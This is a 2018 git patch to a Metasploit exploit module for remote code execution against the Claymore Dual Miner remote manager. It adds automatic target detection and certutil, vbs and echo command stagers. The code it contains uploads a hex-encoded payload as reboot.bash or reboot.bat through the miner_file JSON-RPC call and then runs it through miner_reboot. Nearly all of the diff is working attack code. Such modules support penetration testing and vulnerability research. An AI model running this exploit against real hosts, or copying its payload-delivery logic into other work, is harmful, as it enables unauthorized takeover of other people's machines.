From 53f158ef4ffe0f28714ddf49dda0e1440055222a Mon Sep 17 00:00:00 2001 From: phra Date: Wed, 27 Jun 2018 17:11:47 +0200 Subject: [PATCH] refactor: universal check, payload platform check --- .../claymore_dual_miner_remote_manager_rce.rb | 142 +++++++++++------- 1 file changed, 85 insertions(+), 57 deletions(-) diff --git a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb index 915ba44741..703c479238 100644 --- a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb +++ b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb @@ -33,16 +33,19 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => ['win', 'linux'], 'Targets' => [ + [ 'Automatic Target', { 'auto' => true }], [ 'Linux', { 'Platform' => 'linux', - 'Arch' => ARCH_X64 + 'Arch' => ARCH_X64, + 'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf' ] } ], [ 'Windows', { 'Platform' => 'windows', - 'Arch' => ARCH_X64 + 'Arch' => ARCH_X64, + 'CmdStagerFlavor' => [ 'certutil', 'vbs' ] } ] ], @@ -60,66 +63,34 @@ class MetasploitModule < Msf::Exploit::Remote deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST') end - def execute_command(cmd, opts = {}) - case target['Platform'] - when 'linux' - cmd = Rex::Text.to_hex(cmd, '') - when 'windows' - cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '') - end - case target['Platform'] - when 'linux' - upload = { - "id" => 0, - "jsonrpc" => '2.0', - "method" => 'miner_file', - "params" => ['reboot.bash', "#{cmd}"] - }.to_json - when 'windows' - upload = { - "id" => 0, - "jsonrpc" => '2.0', - "method" => 'miner_file', - "params" => ['reboot.bat', "#{cmd}"] - }.to_json - end - begin - connect - sock.put(upload) - buf = sock.get_once || '' - rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e - print_error(e) - ensure - disconnect - end - trigger_vulnerability - end - - def trigger_vulnerability - execute = { + def select_target + data = { "id" => 0, "jsonrpc" => '2.0', - "method" => 'miner_reboot' + "method" => 'miner_getfile', + "params" => ['config.txt'] }.to_json connect - sock.put(execute) + sock.put(data) buf = sock.get_once || '' - rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e - print_error(e) - ensure - disconnect - end - - def exploit - case target['Platform'] - when 'linux' - execute_cmdstager - when 'windows' - execute_cmdstager(linemax: 20000) + tmp = StringIO.new + tmp << buf + tmp2 = tmp.string + hex = '' + if tmp2.scan(/\w+/)[5] + return self.targets[1] + elsif tmp2.scan(/\w+/)[7] + return self.targets[2] + else + return nil end end def check + target = select_target + if target.nil? + return Exploit::CheckCode::Safe + end data = { "id" => 0, "jsonrpc" => '2.0', @@ -139,9 +110,6 @@ class MetasploitModule < Msf::Exploit::Remote when 'windows' hex = tmp2.scan(/\w+/)[7] end - if not hex - return Exploit::CheckCode::Safe - end str = Rex::Text.hex_to_raw(hex) if str.include?('WARNING') return Exploit::CheckCode::Vulnerable @@ -149,9 +117,69 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Detected end rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e - vprint_error(e) + vprint_error(e.message) return Exploit::CheckCode::Unknown ensure disconnect end + + def execute_command(cmd, opts = {}) + target = select_target + case target['Platform'] + when 'linux' + cmd = Rex::Text.to_hex(cmd, '') + upload = { + "id" => 0, + "jsonrpc" => '2.0', + "method" => 'miner_file', + "params" => ['reboot.bash', "#{cmd}"] + }.to_json + when 'windows' + cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '') + upload = { + "id" => 0, + "jsonrpc" => '2.0', + "method" => 'miner_file', + "params" => ['reboot.bat', "#{cmd}"] + }.to_json + end + + connect + sock.put(upload) + buf = sock.get_once || '' + trigger_vulnerability + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + fail_with(Failure::UnexpectedReply, e.message) + ensure + disconnect + end + + def trigger_vulnerability + execute = { + "id" => 0, + "jsonrpc" => '2.0', + "method" => 'miner_reboot' + }.to_json + connect + sock.put(execute) + buf = sock.get_once || '' + disconnect + end + + def exploit + target = select_target + if target.nil? + fail_with(Exploit::Failure::NoTarget, 'No matching target') + end + if (target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) || + (target['Platform'].eql?('windows') && payload_instance.name !~ /windows/i) + fail_with Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{target.name}'" + end + case target['Platform'] + when 'linux' + execute_cmdstager(flavor: :echo, linemax: 100000) + when 'windows' + execute_cmdstager(flavor: :vbs, linemax: 100000) + end + end end